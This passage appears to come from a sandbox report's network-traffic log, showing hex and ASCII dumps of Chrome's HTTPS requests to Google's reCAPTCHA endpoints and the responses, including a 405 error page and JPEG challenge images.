                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  65192.168.2.1649795142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5793
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC5793OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 36 6a 66 76 49 34 38 52 74 34 50 32 71 51 78 36 4c 4d 5f 56 75 4e 67 45 41 4e 75 34 33 74 6a 7a 34 4a 7a 67 59 79 6b 45 35 48 76 67 66 6e 6d 4d 79 53 73 64 78 34 48 4a 4c 68 74 47 44 52 31 76 4e 74 4b 79 6d 32 62 34 33 39 52 4a 39 44 54 6a 6e 76 6e 37 62 4c 31 63 5a 57 54 59 78 62 75 37 57 6e 53 61 47 7a 7a 76 6c 43 68 76 56 4f 58 6e 51 78 31 6c 35 56 6c 71 33 64 4c 49 62 67 56 66 4c 64 74 77 5f 73 36 39 6a 31 65 48 44 42 45 5f 4e 32 5a 6a 38 64 43 43 77 41 61 54 4c 4f 53 58 32 4e 48 70 5a 4c 4c 35 56 51 6e 79 33 6d 39 52 72 6a 45 55 75 54 6a 42 69 55 64 6b 47 57 41 76 31 42 51 62 62 50 4d 6b 73 6c 70 41 50 48 4a 6f 30 39 65 39 64 65 51 35 5a 35
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA6jfvI48Rt4P2qQx6LM_VuNgEANu43tjz4JzgYykE5HvgfnmMySsdx4HJLhtGDR1vNtKym2b439RJ9DTjnvn7bL1cZWTYxbu7WnSaGzzvlChvVOXnQx1l5Vlq3dLIbgVfLdtw_s69j1eHDBE_N2Zj8dCCwAaTLOSX2NHpZLL5VQny3m9RrjEUuTjBiUdkGWAv1BQbbPMkslpAPHJo09e9deQ5Z5
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:18 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC684INData Raw: 31 37 61 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 30 59 57 6a 74 32 4f 4d 67 63 4f 38 42 66 4c 78 4c 6b 58 53 4a 71 51 59 6d 41 4f 71 6b 46 61 31 73 47 37 69 63 43 50 49 58 31 75 67 4b 59 33 39 38 72 31 78 68 4c 74 59 57 71 4a 5a 33 48 5f 4b 30 65 49 4c 6a 70 71 6f 66 51 4e 6e 58 42 50 4d 77 64 35 76 64 50 56 62 46 63 4b 74 7a 30 49 42 47 61 34 71 34 73 6a 6b 65 5a 47 5a 77 6d 67 71 41 73 56 44 48 75 6b 64 41 65 35 58 56 79 45 48 62 6c 48 76 6e 69 51 74 74 61 6e 6a 37 4f 67 54 6a 4d 70 52 43 48 46 39 33 4f 62 6f 30 6c 45 35 6b 76 35 66 47 5a 79 6c 6e 56 53 52 42 6f 43 44 75 66 79 67 79 76 38 70 4d 45 33 47 69 52 77 63 47 37 61 57 50 6a 61 68 51 55 67 35 47 74 41 57 65 50 57 45 55 43 31 79 2d 45 35 6c 4b 67 79 4a 53
                                                                                                                                                                                                                                                                  Data Ascii: 17a5)]}'["dresp","03AFcWeA50YWjt2OMgcO8BfLxLkXSJqQYmAOqkFa1sG7icCPIX1ugKY398r1xhLtYWqJZ3H_K0eILjpqofQNnXBPMwd5vdPVbFcKtz0IBGa4q4sjkeZGZwmgqAsVDHukdAe5XVyEHblHvniQttanj7OgTjMpRCHF93Obo0lE5kv5fGZylnVSRBoCDufygyv8pME3GiRwcG7aWPjahQUg5GtAWePWEUC1y-E5lKgyJS
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 4f 48 6a 38 5a 31 76 4a 4a 4e 58 66 55 69 74 70 53 61 36 68 41 41 2d 4b 78 35 73 6b 34 38 56 77 7a 4d 33 55 63 56 6c 46 49 4a 37 44 61 68 6b 53 39 4b 67 4c 56 33 4a 55 4c 66 4e 44 49 37 71 6b 46 51 7a 7a 59 58 2d 50 66 66 45 78 4b 45 46 39 4b 46 32 6c 57 47 38 70 4c 50 74 73 45 46 36 5a 47 47 51 57 45 4f 73 77 75 54 34 37 58 77 63 64 46 30 72 50 72 79 6f 45 42 52 61 34 55 31 77 30 36 59 76 30 52 31 62 59 6b 69 42 57 5f 43 6e 4e 67 51 38 59 78 77 52 58 31 5a 78 47 6e 4a 38 57 30 37 5f 34 76 48 45 4a 58 48 64 6c 35 42 39 5a 62 6d 5a 7a 55 42 76 6a 35 34 41 52 75 54 37 74 4e 56 4a 61 39 6d 47 55 66 48 69 79 72 71 67 79 54 31 54 71 37 48 59 66 56 57 31 6e 78 71 42 32 4d 5a 4b 47 75 56 4b 39 6a 6d 53 44 5a 45 64 54 79 58 58 5f 4b 4e 4a 51 49 67 76 68 79 75 35
                                                                                                                                                                                                                                                                  Data Ascii: OHj8Z1vJJNXfUitpSa6hAA-Kx5sk48VwzM3UcVlFIJ7DahkS9KgLV3JULfNDI7qkFQzzYX-PffExKEF9KF2lWG8pLPtsEF6ZGGQWEOswuT47XwcdF0rPryoEBRa4U1w06Yv0R1bYkiBW_CnNgQ8YxwRX1ZxGnJ8W07_4vHEJXHdl5B9ZbmZzUBvj54ARuT7tNVJa9mGUfHiyrqgyT1Tq7HYfVW1nxqB2MZKGuVK9jmSDZEdTyXX_KNJQIgvhyu5
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 73 70 62 59 6b 64 42 36 71 79 4f 38 59 43 37 55 6d 33 50 45 38 37 44 4f 67 64 45 6e 67 6f 32 45 58 37 37 5f 2d 62 72 66 78 46 6b 63 4e 4d 54 57 39 4e 4a 54 74 30 66 66 31 7a 5a 49 4b 4c 42 61 4b 5a 48 30 51 4b 78 59 5a 68 43 70 36 67 38 47 37 67 43 55 4e 50 50 30 69 34 75 5a 43 53 36 31 75 63 51 32 6d 55 65 63 33 67 36 35 54 68 66 46 73 4e 54 35 70 69 59 67 49 74 45 51 66 61 6c 49 71 45 41 4d 45 5a 47 2d 70 67 65 73 73 33 53 6c 71 6b 36 43 75 37 42 6f 37 4a 69 56 41 65 67 36 4b 31 32 42 30 34 4a 43 37 45 53 57 47 61 64 79 78 75 42 6a 46 6a 79 43 6b 51 4f 78 6c 74 4d 42 56 5a 30 41 6e 68 62 4a 38 30 6e 75 32 37 74 77 68 53 64 6b 54 4a 30 30 55 74 4a 38 44 46 52 5f 57 54 49 69 79 47 6f 71 57 39 42 44 4d 47 75 54 4a 6d 6e 74 6a 6b 54 47 2d 35 52 78 75 41 6d
                                                                                                                                                                                                                                                                  Data Ascii: spbYkdB6qyO8YC7Um3PE87DOgdEngo2EX77_-brfxFkcNMTW9NJTt0ff1zZIKLBaKZH0QKxYZhCp6g8G7gCUNPP0i4uZCS61ucQ2mUec3g65ThfFsNT5piYgItEQfalIqEAMEZG-pgess3Slqk6Cu7Bo7JiVAeg6K12B04JC7ESWGadyxuBjFjyCkQOxltMBVZ0AnhbJ80nu27twhSdkTJ00UtJ8DFR_WTIiyGoqW9BDMGuTJmntjkTG-5RxuAm
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 57 5f 33 34 53 73 58 49 7a 66 46 41 38 7a 66 6b 49 7a 57 68 59 6e 54 4a 68 55 74 53 58 58 67 56 33 6c 49 51 44 56 52 37 62 35 76 79 44 4b 7a 43 6b 36 75 46 5a 4d 4d 48 57 6b 58 59 57 59 76 56 4e 78 73 59 31 39 66 6d 34 2d 56 44 58 4c 31 63 6e 36 51 7a 37 48 4a 30 79 6e 71 4a 76 61 69 6e 33 30 46 43 4a 31 4b 4f 50 5f 32 48 35 31 30 70 79 6a 71 4b 64 77 46 59 77 72 2d 67 54 6d 6b 54 75 59 4e 31 52 61 67 79 34 4a 68 48 52 50 4b 70 71 6c 6b 69 30 6f 34 2d 67 7a 77 62 4b 4a 49 76 67 50 6f 35 4b 56 55 41 68 71 70 69 43 37 6c 59 33 70 6e 39 53 65 61 30 4a 70 6a 73 4c 4b 6b 6e 65 4e 75 34 45 61 78 49 43 4f 2d 49 43 31 48 6a 39 49 2d 70 6e 38 79 43 30 69 47 58 48 36 70 35 47 74 55 52 65 6a 2d 30 79 47 31 53 77 51 4d 36 35 6c 44 4e 65 2d 6f 72 6e 4a 4e 37 30 74 48
                                                                                                                                                                                                                                                                  Data Ascii: W_34SsXIzfFA8zfkIzWhYnTJhUtSXXgV3lIQDVR7b5vyDKzCk6uFZMMHWkXYWYvVNxsY19fm4-VDXL1cn6Qz7HJ0ynqJvain30FCJ1KOP_2H510pyjqKdwFYwr-gTmkTuYN1Ragy4JhHRPKpqlki0o4-gzwbKJIvgPo5KVUAhqpiC7lY3pn9Sea0JpjsLKkneNu4EaxICO-IC1Hj9I-pn8yC0iGXH6p5GtURej-0yG1SwQM65lDNe-ornJN70tH
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1243INData Raw: 76 32 4a 44 76 66 34 44 59 47 62 62 6c 55 39 52 51 43 6b 57 53 47 51 35 77 50 7a 6a 31 6e 70 4f 4b 66 77 30 55 72 5f 69 47 34 53 39 56 6b 73 5a 70 54 6e 39 4c 79 55 63 6f 78 6d 53 70 32 45 77 46 65 34 68 63 71 4e 72 36 49 72 62 6c 61 6f 44 39 6b 47 33 41 42 4e 38 5f 45 66 56 69 53 77 4a 62 38 42 58 30 66 71 2d 57 52 38 4c 62 72 41 78 6b 42 31 57 71 36 6d 39 47 74 2d 4b 2d 30 52 5a 38 43 64 78 68 46 47 57 68 77 74 38 78 4e 73 64 4f 47 53 56 49 48 32 6d 71 67 71 42 37 6d 73 73 34 37 59 4d 33 44 6e 67 49 63 48 35 43 50 6b 67 54 31 74 32 36 5a 64 6c 6f 56 72 4b 52 53 50 79 38 6c 2d 72 49 53 35 6e 4c 79 59 64 2d 39 4f 62 43 4b 6d 67 67 4b 67 31 4f 68 63 57 6a 46 4f 37 67 52 78 36 73 7a 5a 67 7a 31 42 52 76 70 32 39 4f 50 30 4a 71 39 43 75 59 32 45 53 2d 32 49
                                                                                                                                                                                                                                                                  Data Ascii: v2JDvf4DYGbblU9RQCkWSGQ5wPzj1npOKfw0Ur_iG4S9VksZpTn9LyUcoxmSp2EwFe4hcqNr6IrblaoD9kG3ABN8_EfViSwJb8BX0fq-WR8LbrAxkB1Wq6m9Gt-K-0RZ8CdxhFGWhwt8xNsdOGSVIH2mqgqB7mss47YM3DngIcH5CPkgT1t26ZdloVrKRSPy8l-rIS5nLyYd-9ObCKmggKg1OhcWjFO7gRx6szZgz1BRvp29OP0Jq9CuY2ES-2I
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  66192.168.2.1649794142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA6dVEIzpM3JHrpCYl9jcz_iqJn4_8jFXNv0yxm-6V4bX-xWihKEepTmtHOMOHVz3RjBTrXT7dN7gYxYTmvM9pch9frD_2Mt3aIGC1iHFdAculPLW-E-pvMwfXqdU-eFFIvfmgYdo6khSBA0SncV71vkgo0b4sCXigzgrEIRJFzMpiO5gqUj7ZosUIYXEi-OK8ItEStpAw4diRUHM1nMSnHfpBwisw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=6666e44f208ad0c5 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:18 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:18 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC697INData Raw: 31 36 61 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 16a3JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 04 ff 00 4c 64 1a 8a 1b 69 a3 62 a1 4c 6d 1a b9 31 b9 03 68 fe 32 db 88 38 24 75 18 c7 38 a9 93 b2 ec 8c b9 53 5a ef b7 f5 af f5 eb ba 5c ca 41 92 e3 74 4a bb bc d9 04 cc 4b 02 79 00 7c b8 3f 97 4c 74 e7 2d b9 b5 f2 a4 60 11 5d dc 06 74 08 31 12 ff 00 10 24 9c 63 69 27 a1 18 03 3c 63 36 59 a3 97 cc 9c 1d 92 ce a5 50 01 b9 10 e0 30 da 73 f3 1e a4 00 0f 7c e7 bd 50 6d e3 50 32 b2 a8 5c c8 a1 71 e6 a8 c3 10 36 f7 04 e4 6d ea 07 38 c0 cd 2a 8b 66 b6 fe bf 3f ea da 96 b9 9c 6d d4 94 18 d5 1d cc 6f 25 a4 ca 16 49 3c d6 21 d7 2c 40 60 71 81 86 e8 0f e3 cd 32 e6 76 86 e1 ee e7 b8 75 97 e4 70 d8 1b b9 04 16 23 8c 01 bf 03 23 f2 e6 a4 f9 77 44 3c b0 ca 40 63 bc 02 e5 b1 92 0a f4 24 61 4f 4c 75 ee 78 8a 21 20 84 db a9 8b 7b e4 49 b8 61 9c 93 91 d0 f5 c7 61 d7 af 5c
                                                                                                                                                                                                                                                                  Data Ascii: LdibLm1h28$u8SZ\AtJKy|?Lt-`]t1$ci'<c6YP0s|PmP2\q6m8*f?mo%I<!,@`q2vup##wD<@c$aOLux! {Iaa\
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 08 c4 42 60 58 b3 ef 42 46 47 1d f2 07 73 c9 27 d6 b3 e1 7f 14 de cf 32 a6 b1 70 1d 9d 91 58 cc 40 e5 8e 71 f8 e3 3d fe b8 a9 e5 b6 ad f6 e9 a7 f5 b0 bd ae 89 47 6f f8 6d 3d 74 f9 1d 04 5a 57 c4 08 5e 64 62 92 91 21 05 a3 9c a0 c8 c0 3c 06 f5 07 fc f1 45 73 d7 16 5a ff 00 9a df 6b d6 27 b9 9b 24 b3 5b 5e 3e c1 93 9c 74 f7 fc 88 a2 93 c3 e1 e5 ab 93 b9 c3 53 17 4e 32 6a 51 bb ff 00 b7 7f 53 a4 d5 3c 53 63 a4 d8 58 5e 4f 7f 14 ab 79 99 a2 55 47 6f 93 0a 32 46 41 e0 a9 3c fa 1e f4 c8 be 20 68 57 97 82 dc 4b bc f9 88 b0 a3 5a b6 d9 24 00 7d ee 70 01 3d 4f a0 cf bd 70 5e 3d 30 b6 91 e1 e6 de 43 1b 26 24 1c 3a 80 76 8e 39 e3 b8 fc 01 eb 5c d6 9b 2a 4d ab c0 c6 4d 85 a4 5f 9d 49 2d c9 c7 07 d7 d0 7a 63 8e 2b a6 e9 ea fc ff 00 af 3f cc d6 dc ca ea fe b6 d7 fa fe
                                                                                                                                                                                                                                                                  Data Ascii: B`XBFGs'2pX@q=Gom=tZW^db!<EsZk'$[^>tSN2jQS<ScX^OyUGo2FA< hWKZ$}p=Op^=0C&$:v9\*MM_I-zc+?
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC1378INData Raw: 8e 41 df b8 93 8c 9d bc f3 cf e3 59 4d 71 69 a5 fc 41 bd bc 90 1b 6b 7f b5 4d 27 ef 98 e0 7c 84 12 5b 3d f9 ee 09 e8 33 52 5d 5d 5a ea d3 3e a1 60 d2 88 ee 14 48 21 de 30 84 67 20 a8 1f 36 32 72 d9 04 7f 3c 64 a2 a0 ac 2a 6b a6 ff 00 35 fd 3f 2d ff 00 cf 56 d2 08 74 e8 8c 76 f7 41 63 19 dc 16 7d cd 83 9e 7a f2 48 19 e8 3a e7 3c 73 1b 6a 1a 42 ca d6 d1 5c c9 74 c1 0f 41 b9 65 72 06 00 c0 3d 3d bb 91 f8 e4 c1 67 2c 8d 12 79 f2 5d 49 b5 bc b0 40 2c ef c1 24 1e a3 19 f5 fc b1 8a 6d b8 49 22 1b c5 b4 68 aa 8a 81 9b 6a 15 27 05 1c 0e 83 e5 1d 33 c1 e7 ad 66 f9 5b 6f fe 0f e8 74 c6 9b 97 ba bf a7 f3 df f0 d7 cc be da c5 ac c2 dd 45 a3 cb 14 8c 07 9a c8 55 9f 71 f9 72 73 ce 57 bf d3 9e a6 9c fa bd eb 18 67 ff 00 47 b7 74 90 aa 7e f0 bb a8 2d 92 a4 9c 80 01 c0 1c
                                                                                                                                                                                                                                                                  Data Ascii: AYMqiAkM'|[=3R]]Z>`H!0g 62r<d*k5?-VtvAc}zH:<sjB\tAer==g,y]I@,$mI"hj'3f[otEUqrsWgGt~-
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC972INData Raw: 2c b2 5c 4a 11 7e 5c 12 72 39 04 03 8c 1e fd 68 52 be bf f0 4a 8c 1b 7a 9e 69 69 17 da 23 55 8e 26 c9 60 d2 10 42 fc a7 68 1c 75 3d 57 f3 ab 91 58 c9 33 84 4f 9d 86 d2 b8 90 f1 93 85 27 8e 43 67 ff 00 af cf 1e 93 36 9b e0 3d 26 c4 ca d7 b3 eb 72 06 f2 a3 58 94 c7 18 40 0f 43 9e 83 38 38 3d 01 a8 9b c5 77 36 70 1b 4f 0f 69 96 56 26 55 76 67 31 09 5d ce 41 39 39 e3 a8 3c 8c 67 1c f3 4d b6 9f bd f7 7e 64 ae 4b ea 62 5a f8 1f 58 60 b7 53 5a fd 96 c8 e5 9d ee 25 f2 ca 46 33 f3 73 82 33 c9 03 1d 8d 69 3e 97 e1 3d 2c c8 35 3d 61 b5 29 14 34 72 a5 92 71 23 6e f9 7f 78 7a 8e 07 19 c8 c7 1d 6b 16 ee f6 fe fe e9 64 be bd 96 e2 64 c4 8a 66 77 1b 79 fb a4 37 03 19 6e a3 be 01 39 35 0b 41 1e 21 91 e1 11 c4 a9 e5 e6 45 2c c3 2c 36 b8 c9 07 b6 70 31 d4 e4 f4 14 d5 95 a2
                                                                                                                                                                                                                                                                  Data Ascii: ,\J~\r9hRJzii#U&`Bhu=WX3O'Cg6=&rX@C88=w6pOiV&Uvg1]A99<gM~dKbZX`SZ%F3s3i>=,5=a)4rq#nxzkddfwy7n95A!E,,6p1
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  67192.168.2.1649797142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:19 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5814
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
